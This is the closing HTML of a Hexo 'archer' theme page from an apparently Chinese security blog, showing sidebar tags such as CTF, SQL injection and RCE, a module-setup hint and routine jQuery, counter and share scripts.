        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="SSTI"><span class="iconfont-archer">&#xe606;</span>SSTI</span>
    
        <span class="sidebar-tag-name" data-tags="协议层安全"><span class="iconfont-archer">&#xe606;</span>协议层安全</span>
    
        <span class="sidebar-tag-name" data-tags="PHP安全"><span class="iconfont-archer">&#xe606;</span>PHP安全</span>
    
        <span class="sidebar-tag-name" data-tags="代码审计"><span class="iconfont-archer">&#xe606;</span>代码审计</span>
    
        <span class="sidebar-tag-name" data-tags="文件包含"><span class="iconfont-archer">&#xe606;</span>文件包含</span>
    
        <span class="sidebar-tag-name" data-tags="Linux应急响应"><span class="iconfont-archer">&#xe606;</span>Linux应急响应</span>
    
        <span class="sidebar-tag-name" data-tags="端口"><span class="iconfont-archer">&#xe606;</span>端口</span>
    
        <span class="sidebar-tag-name" data-tags="漏洞挖掘"><span class="iconfont-archer">&#xe606;</span>漏洞挖掘</span>
    
        <span class="sidebar-tag-name" data-tags="SQL注入"><span class="iconfont-archer">&#xe606;</span>SQL注入</span>
    
        <span class="sidebar-tag-name" data-tags="iptables"><span class="iconfont-archer">&#xe606;</span>iptables</span>
    
        <span class="sidebar-tag-name" data-tags="APT"><span class="iconfont-archer">&#xe606;</span>APT</span>
    
        <span class="sidebar-tag-name" data-tags="RCE"><span class="iconfont-archer">&#xe606;</span>RCE</span>
    
        <span class="sidebar-tag-name" data-tags="Redis"><span class="iconfont-archer">&#xe606;</span>Redis</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="渗透测试"><span class="iconfont-archer">&#xe60a;</span>渗透测试</span>
    
        <span class="sidebar-category-name" data-categories="运维知识"><span class="iconfont-archer">&#xe60a;</span>运维知识</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "m0nk3y"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


